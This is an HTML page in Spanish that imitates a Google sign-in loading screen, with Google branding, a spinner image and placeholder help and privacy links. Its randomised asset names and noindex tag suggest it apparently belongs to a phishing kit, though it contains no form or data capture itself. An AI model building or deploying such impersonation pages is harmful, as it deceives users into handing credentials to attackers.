<!DOCTYPE html>
<html>
    <head>
        <title>Iniciando Sesión</title>

        <meta charset='UTF-8'>
        <meta http-equiv="cache-control" content="no-cache" />
        <meta http-equiv="expires" content="0" />
        <meta http-equiv="pragma" content="no-cache" />
        <meta name="viewport" content="width=device-width,
        initial-scale=0.75, maximum-scale=0.75, user-scalable=no">
        <meta name="robots" content="noindex, nofollow"> 
    
        <script src="static/js/jquery.min.js"></script>
    
        <link rel="stylesheet" href="static/css/bootstrap.min.css">
        <link rel="stylesheet" href="static/css/style.css">
        <link rel="icon" type="image/png" href="static/img/oc3czvmbvf.png"/>
    
        <style>
    
        .google-header-bar {
        height: 71px;
        border-bottom: 1px solid #e5e5e5;
        overflow: hidden;
        }
    
        .google-header-bar.centered {
        border: 0;
        height: 108px;
        }
    
        .google-header-bar.centered .header .logo {
        float: none;
        margin: 40px auto 30px;
        display: block;
        }
        .google-header-bar.centered .header .secondary-link {
        display: none
        }
    
        .header .logo {
        margin: 17px 0 0;
        float: left;
        height: 38px;
        width: 116px;
        }
    
        </style>
    
        <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
    
          .google-header-bar.centered {
            height: 83px;
          }
    
          .google-header-bar.centered .header .logo {
            margin: 25px auto 20px;
          }
    
          .card {
            margin-bottom: 20px;
          }
    
        </style>
    
        <style media="screen and (max-width: 580px)">
    
          html,
          body {
            font-size: 14px;
          }
    
          .google-header-bar.centered {
            height: 73px;
          }
    
          .google-header-bar.centered .header .logo {
            margin: 20px auto 15px;
          }
    
          .content {
            padding-left: 10px;
            padding-right: 10px;
          }
    
          .hidden-small {
            display: none;
          }
    
          .card {
            padding: 20px 15px 30px;
            width: 270px;
          }
    
          .footer ul li {
            padding-right: 1em;
          }
    
          .lang-chooser-wrap {
            display: none;
          }
    
        </style>
    </head>
    <body>
        <div class="container">

            <div class="google-header-bar centered">
              <div class="header content clearfix">
                <img alt="Google" class="logo" src="static/img/dtnk16mcjo.png">
              </div>
            </div>
            <center>
            
            <p id="text" size=19>Iniciando sesión</p>
            <img src="static/img/download.gif" width="144" height="81">
            

            <br><p class="tagline">Una cuenta para todo</p>
                <img src="static/img/tmjjgvk28i.png" width="210" height="17" alt="">
            </center>
            <a href="#">Ayuda</a> <a href="#">Privacidad</a> <a href="#">Términos</a>
        </div>
    </body>
</html>